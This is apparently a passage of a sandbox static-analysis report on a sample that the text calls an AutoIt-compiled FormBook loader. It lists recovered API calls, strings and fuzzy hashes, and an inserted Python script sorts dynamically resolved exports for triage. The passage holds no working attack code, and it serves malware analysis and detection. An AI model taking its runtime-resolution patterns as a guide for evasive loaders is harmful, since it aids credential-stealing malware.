                                                                                                                                                      APIs
                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(00A760E0,00000FA0,?,?,00A46185), ref: 00A461B3
                                                                                                                                                      • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00A46185), ref: 00A461BE
                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00A46185), ref: 00A461CF
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00A461E1
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00A461EF
                                                                                                                                                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00A46185), ref: 00A46212
                                                                                                                                                      • DeleteCriticalSection.KERNEL32(00A760E0,00000007,?,?,00A46185), ref: 00A46235
                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00A46185), ref: 00A46245
                                                                                                                                                      Strings
                                                                                                                                                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00A461B9
                                                                                                                                                      • kernel32.dll, xrefs: 00A461CA
                                                                                                                                                      • SleepConditionVariableCS, xrefs: 00A461DB
                                                                                                                                                      • WakeAllConditionVariable, xrefs: 00A461E7
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                                                                                                      • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                      • API String ID: 2565136772-3242537097
                                                                                                                                                      • Opcode ID: 949dd86d0bbfcb8d5fcca9ac73476ab2abc00df333fc2d6b1bd0d0a25d5cfa1c
                                                                                                                                                      • Instruction ID: 2384d8fdfbf894705a3b48fdf7eb71f28c4ac3069778145ea7f12dcba8d37818
                                                                                                                                                      • Opcode Fuzzy Hash: 949dd86d0bbfcb8d5fcca9ac73476ab2abc00df333fc2d6b1bd0d0a25d5cfa1c
                                                                                                                                                      • Instruction Fuzzy Hash: 21015275A40B11FFD720DBF56C09F963A58BB85763701C911FD19D2294EBB4C8438A61
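The function at 00A461B3 above does not import SleepConditionVariableCS and WakeAllConditionVariable through the PE import table; it probes api-ms-win-core-synch-l1-2-0.dll and then kernel32.dll with GetModuleHandleW and asks GetProcAddress for the two exports by name. The Python script below is an added example, not part of the Joe Sandbox report and not code from the sample: it parses entries written in the format of the APIs listings on this page, extracts every module probed and every export requested at run time, and sorts the requested names against an allowlist. The allowlist CRT_RUNTIME_RESOLVED is an assumption supplied here, not something the report states: the two condition-variable names, together with the api-ms-win-core-synch / kernel32.dll probe order, match the downlevel fallback that the MSVC runtime compiles into ordinary binaries, so a hit there is runtime plumbing rather than the FormBook payload's own API resolution. Anything the script marks "review" is worth a closer look in the associated dumps; anything marked "unresolved" had its name argument rendered as "?" by the static pass and needs the dynamic trace. The sample listing embedded in the block is copied from this report's entries for 00A461B3.

```python
import re
from typing import Dict, List, NamedTuple


class ApiCall(NamedTuple):
    name: str        # API or CRT symbol, e.g. GetProcAddress
    module: str      # module tag as printed in the listing, e.g. KERNEL32 or LIBCMT
    args: List[str]  # argument column, "?" where the static pass could not recover a value
    ref: str         # call-site address as printed in the listing
    subcall: bool    # True for "Part of subcall function ..." entries


# One "APIs" entry of a Joe Sandbox listing, with or without an argument list:
#   • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00A461E1
#   • _strlen.LIBCMT ref: 00A33F0B
# "Strings" rows ("kernel32.dll, xrefs: ...") do not match because they carry no "ref:".
_ENTRY = re.compile(
    r"^\s*(?:•\s*)?(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_\-]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# ASSUMPTION (not from the report): exports the MSVC runtime resolves through
# GetProcAddress at start-up so the same binary still loads on older Windows.
# Extend only after checking the pattern against your own CRT build.
CRT_RUNTIME_RESOLVED = frozenset({
    "SleepConditionVariableCS", "WakeAllConditionVariable",
    "InitializeConditionVariable", "WakeConditionVariable",
    "FlsAlloc", "FlsFree", "FlsGetValue", "FlsSetValue",
})

_LOADERS = ("GetModuleHandleW", "GetModuleHandleA", "LoadLibraryW", "LoadLibraryA")


def parse_api_listing(text: str) -> List[ApiCall]:
    """Turn the APIs rows of a listing into ApiCall records, in call-site order.
    Arguments are split on commas, so a string argument that itself contains a
    comma would be split too; the listings on this page contain none."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = _ENTRY.match(line)
        if not m:
            continue  # section headers ("APIs", "Strings") and non-API rows
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("name"), m.group("module"), args,
                             m.group("ref").upper(), m.group("sub") is not None))
    return calls


def dynamic_resolution(calls: List[ApiCall]) -> Dict[str, List[str]]:
    """Modules probed through GetModuleHandle*/LoadLibrary* and export names
    requested through GetProcAddress, each in the order the call sites appear."""
    modules: List[str] = []
    exports: List[str] = []
    for c in calls:
        if c.name in _LOADERS and c.args:
            modules.append(c.args[0])
        elif c.name == "GetProcAddress" and len(c.args) >= 2:
            exports.append(c.args[1])
    return {"modules": modules, "exports": exports}


def classify_exports(resolved: Dict[str, List[str]]) -> Dict[str, str]:
    """crt-runtime: matches the CRT fallback allowlist; unresolved: the name was
    not recovered statically ("?"); review: anything else, i.e. resolution the
    program itself asked for."""
    verdict: Dict[str, str] = {}
    for name in resolved["exports"]:
        if not name or name == "?":
            verdict[name] = "unresolved"
        elif name in CRT_RUNTIME_RESOLVED:
            verdict[name] = "crt-runtime"
        else:
            verdict[name] = "review"
    return verdict


# Entries copied from this report's APIs listing for the function at 00A461B3.
SAMPLE_LISTING = """\
APIs
• InitializeCriticalSectionAndSpinCount.KERNEL32(00A760E0,00000FA0,?,?,00A46185), ref: 00A461B3
• GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00A46185), ref: 00A461BE
• GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00A46185), ref: 00A461CF
• GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00A461E1
• GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00A461EF
• CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00A46185), ref: 00A46212
• DeleteCriticalSection.KERNEL32(00A760E0,00000007,?,?,00A46185), ref: 00A46235
• CloseHandle.KERNEL32(00000000,?,?,00A46185), ref: 00A46245
Strings
• api-ms-win-core-synch-l1-2-0.dll, xrefs: 00A461B9
• kernel32.dll, xrefs: 00A461CA
"""

if __name__ == "__main__":
    resolved = dynamic_resolution(parse_api_listing(SAMPLE_LISTING))
    print("modules probed :", resolved["modules"])
    for export, verdict in classify_exports(resolved).items():
        print(f"{export:28s} {verdict}")
```

Run against a whole report, the interesting output is the "review" and "unresolved" rows, not the allowlisted ones; for an AutoIt-compiled stub like this sample, the unpacked FormBook stage is where name-based or hash-based resolution actually happens, and those names appear in the later process dumps rather than in the 00A20000 image analysed here.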
                                                                                                                                                      APIs
                                                                                                                                                      • ___free_lconv_mon.LIBCMT ref: 00A53816
                                                                                                                                                        • Part of subcall function 00A533B1: _free.LIBCMT ref: 00A533CE
                                                                                                                                                        • Part of subcall function 00A533B1: _free.LIBCMT ref: 00A533E0
                                                                                                                                                        • Part of subcall function 00A533B1: _free.LIBCMT ref: 00A533F2
                                                                                                                                                        • Part of subcall function 00A533B1: _free.LIBCMT ref: 00A53404
                                                                                                                                                        • Part of subcall function 00A533B1: _free.LIBCMT ref: 00A53416
                                                                                                                                                        • Part of subcall function 00A533B1: _free.LIBCMT ref: 00A53428
                                                                                                                                                        • Part of subcall function 00A533B1: _free.LIBCMT ref: 00A5343A
                                                                                                                                                        • Part of subcall function 00A533B1: _free.LIBCMT ref: 00A5344C
                                                                                                                                                        • Part of subcall function 00A533B1: _free.LIBCMT ref: 00A5345E
                                                                                                                                                        • Part of subcall function 00A533B1: _free.LIBCMT ref: 00A53470
                                                                                                                                                        • Part of subcall function 00A533B1: _free.LIBCMT ref: 00A53482
                                                                                                                                                        • Part of subcall function 00A533B1: _free.LIBCMT ref: 00A53494
                                                                                                                                                        • Part of subcall function 00A533B1: _free.LIBCMT ref: 00A534A6
                                                                                                                                                      • _free.LIBCMT ref: 00A5380B
                                                                                                                                                        • Part of subcall function 00A503D4: RtlFreeHeap.NTDLL(00000000,00000000,?,00A53546,?,00000000,?,00000000,?,00A5356D,?,00000007,?,?,00A5396A,?), ref: 00A503EA
                                                                                                                                                        • Part of subcall function 00A503D4: GetLastError.KERNEL32(?,?,00A53546,?,00000000,?,00000000,?,00A5356D,?,00000007,?,?,00A5396A,?,?), ref: 00A503FC
                                                                                                                                                      • _free.LIBCMT ref: 00A5382D
                                                                                                                                                      • _free.LIBCMT ref: 00A53842
                                                                                                                                                      • _free.LIBCMT ref: 00A5384D
                                                                                                                                                      • _free.LIBCMT ref: 00A5386F
                                                                                                                                                      • _free.LIBCMT ref: 00A53882
                                                                                                                                                      • _free.LIBCMT ref: 00A53890
                                                                                                                                                      • _free.LIBCMT ref: 00A5389B
                                                                                                                                                      • _free.LIBCMT ref: 00A538D3
                                                                                                                                                      • _free.LIBCMT ref: 00A538DA
                                                                                                                                                      • _free.LIBCMT ref: 00A538F7
                                                                                                                                                      • _free.LIBCMT ref: 00A5390F
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 161543041-0
                                                                                                                                                      • Opcode ID: 6f1d545f7cba452e9899c05efc784f91e67985838c53e4412980b7da69a44498
                                                                                                                                                      • Instruction ID: 759467e523e2d09348e7b6a749d48eb94d91eb60779fa097e6736b969845d344
                                                                                                                                                      • Opcode Fuzzy Hash: 6f1d545f7cba452e9899c05efc784f91e67985838c53e4412980b7da69a44498
                                                                                                                                                      • Instruction Fuzzy Hash: 90315D335042049FEF24AB79E945B5AB3E9BF803A2F144429FC58DB651DA71EA48CB20
                                                                                                                                                      APIs
                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00A3D919
                                                                                                                                                        • Part of subcall function 00A214A7: _wcslen.LIBCMT ref: 00A214B8
                                                                                                                                                      • _wcslen.LIBCMT ref: 00A3D97B
                                                                                                                                                      • _wcslen.LIBCMT ref: 00A3D99A
                                                                                                                                                      • _wcslen.LIBCMT ref: 00A3D9B6
                                                                                                                                                      • _strlen.LIBCMT ref: 00A3DA14
                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,00A5D9F0,00000000,?,00000000,?,<html>,00000006,<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>,?), ref: 00A3DA2D
                                                                                                                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 00A3DA54
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _wcslen$Global$AllocCreateH_prolog3_Stream_strlen
                                                                                                                                                      • String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                                                                                      • API String ID: 1185167184-1533471033
                                                                                                                                                      • Opcode ID: cb67a456faff6ffcdf1f11cd950cf3321e4fb4702d65473d18a978a27fed9970
                                                                                                                                                      • Instruction ID: 2ceb819cb31ca31e8af41bf0ea4f42011415df184b3a86b0ca904f44dab150e7
                                                                                                                                                      • Opcode Fuzzy Hash: cb67a456faff6ffcdf1f11cd950cf3321e4fb4702d65473d18a978a27fed9970
                                                                                                                                                      • Instruction Fuzzy Hash: C8514971D00218EFEB14EBA4DE86BEEBBB9EF55350F140029F505AB181DB705E85CBA1
                                                                                                                                                      APIs
                                                                                                                                                      • GetWindow.USER32(?,00000005), ref: 00A437C4
                                                                                                                                                      • GetClassNameW.USER32(00000000,?,00000080), ref: 00A437F0
                                                                                                                                                        • Part of subcall function 00A38DA4: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,00A30E3F,?,?,?,00000046,00A31ECE,00000046,?,exe,00000046), ref: 00A38DBA
                                                                                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00A4380C
                                                                                                                                                      • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00A43823
                                                                                                                                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 00A43837
                                                                                                                                                      • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00A43860
                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00A43867
                                                                                                                                                      • GetWindow.USER32(00000000,00000002), ref: 00A43870
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                                                                                      • String ID: STATIC
                                                                                                                                                      • API String ID: 3820355801-1882779555
                                                                                                                                                      • Opcode ID: 077c5bc5cd05bddf6d166e6107cf0081f44cd2b43c7291321fdcfd830a1ad307
                                                                                                                                                      • Instruction ID: f892b453c9dbe5aa9425db75ebca9ac3592043ccb00f762106244b8e693d7ada
                                                                                                                                                      • Opcode Fuzzy Hash: 077c5bc5cd05bddf6d166e6107cf0081f44cd2b43c7291321fdcfd830a1ad307
                                                                                                                                                      • Instruction Fuzzy Hash: E02146776483107FEA20EB74DC4AFEFB39CAF84710F004524FA05A60D2DB708A4686A5
                                                                                                                                                      APIs
                                                                                                                                                      • _free.LIBCMT ref: 00A4FF25
                                                                                                                                                        • Part of subcall function 00A503D4: RtlFreeHeap.NTDLL(00000000,00000000,?,00A53546,?,00000000,?,00000000,?,00A5356D,?,00000007,?,?,00A5396A,?), ref: 00A503EA
                                                                                                                                                        • Part of subcall function 00A503D4: GetLastError.KERNEL32(?,?,00A53546,?,00000000,?,00000000,?,00A5356D,?,00000007,?,?,00A5396A,?,?), ref: 00A503FC
                                                                                                                                                      • _free.LIBCMT ref: 00A4FF31
                                                                                                                                                      • _free.LIBCMT ref: 00A4FF3C
                                                                                                                                                      • _free.LIBCMT ref: 00A4FF47
                                                                                                                                                      • _free.LIBCMT ref: 00A4FF52
                                                                                                                                                      • _free.LIBCMT ref: 00A4FF5D
                                                                                                                                                      • _free.LIBCMT ref: 00A4FF68
                                                                                                                                                      • _free.LIBCMT ref: 00A4FF73
                                                                                                                                                      • _free.LIBCMT ref: 00A4FF7E
                                                                                                                                                      • _free.LIBCMT ref: 00A4FF8C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                       • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                       • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                       • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                       • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                       • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                      • Opcode ID: 34b6121307358322502456196d9b3053dcbdb7a497a61fda076ee49eee1b61e3
                                                                                                                                                      • Instruction ID: f518473f6c623f8ebe4e2dc7c1d11544ca891182b1dc0ab30873fd5f48c94fd1
                                                                                                                                                      • Opcode Fuzzy Hash: 34b6121307358322502456196d9b3053dcbdb7a497a61fda076ee49eee1b61e3
                                                                                                                                                      • Instruction Fuzzy Hash: 1611747A51414CBFCF01EF54CA42CDD3BA5FF443A1B5140A5BE089F222DA71DA54DB80
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                       • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                       • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                       • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                       • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                       • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                                                                                      • String ID: csm$csm$csm
                                                                                                                                                      • API String ID: 322700389-393685449
                                                                                                                                                      • Opcode ID: fc38187ca437f06a49d582b479e2d796d8769c4636856b72c468094b2dd567b6
                                                                                                                                                      • Instruction ID: 286e065a77cc8a5d23565c3d01a997271ceb5d5d42fae6376efae2eb791bfd00
                                                                                                                                                      • Opcode Fuzzy Hash: fc38187ca437f06a49d582b479e2d796d8769c4636856b72c468094b2dd567b6
                                                                                                                                                      • Instruction Fuzzy Hash: A5B15779C00209EFCF29DFA4DA819AFBBB5FF94310F14455AE8046B212D731DA61CB92
                                                                                                                                                      APIs
                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00A2D99A
                                                                                                                                                      • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 00A2D9BF
                                                                                                                                                      • GetLongPathNameW.KERNEL32(?,?,?), ref: 00A2DA11
                                                                                                                                                      • GetShortPathNameW.KERNEL32(?,00000000,00000000), ref: 00A2DA34
                                                                                                                                                      • GetShortPathNameW.KERNEL32(?,?,?), ref: 00A2DA84
                                                                                                                                                      • MoveFileW.KERNEL32(-00000040,-00000028), ref: 00A2DC9F
                                                                                                                                                      • MoveFileW.KERNEL32(-00000028,-00000040), ref: 00A2DCEC
                                                                                                                                                        • Part of subcall function 00A214A7: _wcslen.LIBCMT ref: 00A214B8
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                       • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                       • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                       • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                       • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                       • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: NamePath$FileLongMoveShort$H_prolog3__wcslen
                                                                                                                                                      • String ID: rtmp
                                                                                                                                                      • API String ID: 2388273531-870060881
                                                                                                                                                      • Opcode ID: 7516a6d4c35f0237ae15708a807f997ebceeb5ed44600642b206947f012ae063
                                                                                                                                                      • Instruction ID: 124524dbcca8e6924974237ac8ef262b48503859631f0a22a11700d2ccd1160f
                                                                                                                                                      • Opcode Fuzzy Hash: 7516a6d4c35f0237ae15708a807f997ebceeb5ed44600642b206947f012ae063
                                                                                                                                                      • Instruction Fuzzy Hash: 75B14970901268DACF20DFA8ED85BDDBBB9BF15305F4444A9E409A7252DB309B89CF60
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                       • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                       • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                       • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                       • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                       • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: H_prolog3__wcslen
                                                                                                                                                      • String ID: .rar$exe$rar$sfx
                                                                                                                                                      • API String ID: 3251556500-630704357
                                                                                                                                                      • Opcode ID: ef64c9f44d61b92f3c4987d86e51c0cde33327d68bc8f67e4a4f78cc236ad343
                                                                                                                                                      • Instruction ID: 6f97d61152ad010ec3be1583555b22535b3fe858dd5e90b24038cc47b5c3df52
                                                                                                                                                      • Opcode Fuzzy Hash: ef64c9f44d61b92f3c4987d86e51c0cde33327d68bc8f67e4a4f78cc236ad343
                                                                                                                                                      • Instruction Fuzzy Hash: 7D71E430A007149FCB25DFA9DA81BAEB7B4FF59B10F20052AF8819B291DB719D46C791
                                                                                                                                                      APIs
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00A304AB,00A304AD,00000000,00000000,5C02E116,00000001,00000000,00000000,?,00A3038C,?,00000004,00A304AB,ROOT\CIMV2), ref: 00A45459
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00A304AB,?,00000000,00000000,?,?,00A3038C,?,00000004,00A304AB), ref: 00A454D4
                                                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 00A454DF
                                                                                                                                                      • _com_issue_error.COMSUPP ref: 00A45508
                                                                                                                                                      • _com_issue_error.COMSUPP ref: 00A45512
                                                                                                                                                      • GetLastError.KERNEL32(80070057,5C02E116,00000001,00000000,00000000,?,00A3038C,?,00000004,00A304AB,ROOT\CIMV2), ref: 00A45517
                                                                                                                                                      • _com_issue_error.COMSUPP ref: 00A4552A
                                                                                                                                                      • GetLastError.KERNEL32(00000000,?,00A3038C,?,00000004,00A304AB,ROOT\CIMV2), ref: 00A45540
                                                                                                                                                      • _com_issue_error.COMSUPP ref: 00A45553
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                       • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                       • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                       • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                       • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                       • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1353541977-0
                                                                                                                                                      • Opcode ID: 1348f825c888f4179389f1710388649352059cf50695195c71573bf747908a4a
                                                                                                                                                      • Instruction ID: 49582ea27ef8403144d9215415e42b2026cde8ab01fdfb5841f02060d6c6a5f7
                                                                                                                                                      • Opcode Fuzzy Hash: 1348f825c888f4179389f1710388649352059cf50695195c71573bf747908a4a
                                                                                                                                                      • Instruction Fuzzy Hash: A241F879E00704EBC710DFB8D945BAEB7B9FB84711F104229F405EB282D7349941CBA5
                                                                                                                                                      APIs
                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00A30470
                                                                                                                                                        • Part of subcall function 00A30360: __EH_prolog3.LIBCMT ref: 00A30367
                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00A305FA
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                       • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                       • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                       • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                       • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                       • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: H_prolog3$ClearVariant
